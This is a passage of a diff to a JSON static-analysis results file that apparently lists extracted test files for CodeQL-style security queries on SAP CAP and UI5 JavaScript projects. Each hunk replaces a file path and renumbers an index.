], @@ -4466,7 +4442,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4478,9 +4454,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 58 + "index" : 53 } } } ], @@ -4492,7 +4468,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4504,9 +4480,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", "uriBaseId" : "%SRCROOT%", - "index" : 59 + "index" : 54 } } } ], @@ -4518,7 +4494,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4530,9 +4506,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", "uriBaseId" : "%SRCROOT%", - "index" : 60 + "index" : 55 } } } ], @@ -4544,7 +4520,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4556,9 +4532,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 61 + "index" : 56 } } } ], @@ -4570,7 +4546,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4582,9 +4558,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 62 + "index" : 57 } } } ], 
@@ -4596,7 +4572,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4608,9 +4584,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 63 + "index" : 58 } } } ], @@ -4622,7 +4598,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4634,9 +4610,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 64 + "index" : 59 } } } ], @@ -4648,7 +4624,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4660,9 +4636,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 65 + "index" : 60 } } } ], @@ -4674,7 +4650,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4686,9 +4662,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 66 + "index" : 61 } } } ], @@ -4700,7 +4676,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4712,9 +4688,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 67 + "index" : 62 } } } ], @@ -4726,7 +4702,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4738,9 +4714,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 68 + "index" : 63 } } } ], @@ -4752,7 +4728,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4764,9 +4740,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 69 + "index" : 64 } } } ], @@ -4778,7 +4754,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4790,9 +4766,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 70 + "index" : 65 } } } ], @@ -4804,7 +4780,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4816,9 +4792,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 71 + "index" : 66 } } } ], @@ -4830,7 +4806,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4842,9 +4818,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 72 + "index" : 67 } } } ], @@ -4856,7 +4832,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4868,9 +4844,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 73 + "index" : 68 } } } ], @@ -4882,7 +4858,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4894,9 +4870,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 74 + "index" : 69 } } } ], @@ -4908,7 +4884,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4920,9 +4896,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 75 + "index" : 70 } } } ], @@ -4934,7 +4910,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4946,9 +4922,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 76 + "index" : 71 } } } ], @@ -4960,7 +4936,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4972,9 +4948,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 77 + "index" : 72 } } } ], @@ -4986,7 +4962,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4998,9 +4974,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 78 + "index" : 73 } } } ], @@ -5012,7 +4988,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5024,9 +5000,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 79 + "index" : 74 } } } ], @@ -5038,7 +5014,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5050,9 +5026,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 80 + "index" : 75 } } } ], @@ -5064,7 +5040,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5076,9 +5052,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 81 + "index" : 76 } } } ], @@ -5090,7 +5066,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5102,9 +5078,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 1 + "index" : 77 } } } ], @@ -5116,7 +5092,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5128,9 +5104,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 82 + "index" : 78 } } } ], @@ -5142,7 +5118,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5154,9 +5130,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 83 + "index" : 79 } } } ], @@ -5168,7 +5144,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5180,9 +5156,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 84 + "index" : 80 } } } ], @@ -5194,7 +5170,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5206,9 +5182,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 85 + "index" : 81 } } } ], @@ -5220,7 +5196,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5232,9 +5208,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 86 + "index" : 82 } } } ], @@ -5246,7 +5222,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5258,9 +5234,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 87 + "index" : 83 } } } ], @@ -5272,7 +5248,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5284,9 +5260,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 2 + "index" : 84 } } } ], @@ -5298,7 +5274,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5310,9 +5286,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 88 + "index" : 85 } } } ], @@ -5324,7 +5300,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5336,9 +5312,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 89 + "index" : 86 } } } ], @@ -5350,7 +5326,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5362,9 +5338,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 90 + "index" : 87 } } } ], @@ -5376,7 +5352,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5388,9 +5364,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 91 + "index" : 88 } } } ], @@ -5402,7 +5378,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5414,9 +5390,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 92 + "index" : 89 } } } ], @@ -5428,7 +5404,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5440,9 +5416,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 93 + "index" : 90 } } } ], @@ -5454,7 +5430,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5466,9 +5442,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 94 + "index" : 91 } } } ], @@ -5480,7 +5456,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5492,9 +5468,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 95 + "index" : 92 } } } ], @@ -5506,7 +5482,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5518,9 +5494,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 96 + "index" : 93 } } } ], @@ -5532,7 +5508,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5544,9 +5520,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 97 + "index" : 94 } } } ], @@ -5558,7 +5534,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5570,9 +5546,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 98 + "index" : 95 } } } ], @@ -5584,7 +5560,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5596,9 +5572,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 99 + "index" : 96 } } } ], @@ -5610,7 +5586,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5622,9 +5598,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 100 + "index" : 97 } } } ], @@ -5636,7 +5612,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5648,9 +5624,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 101 + "index" : 98 } } } ], @@ -5662,7 +5638,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5674,9 +5650,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 102 + "index" : 99 } } } ], @@ -5688,7 +5664,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5700,9 +5676,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 100 } } } ], @@ -5714,7 +5690,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5726,9 +5702,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 104 + "index" : 101 } } } ], @@ -5740,7 +5716,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5752,9 +5728,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 105 + "index" : 102 } } } ], @@ -5766,7 +5742,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -5778,9 +5754,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 103 } } } ], @@ -5792,7 +5768,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5804,9 +5780,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 107 + "index" : 104 } } } ], @@ -5818,7 +5794,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5830,9 +5806,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 105 } } } ], @@ -5844,7 +5820,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
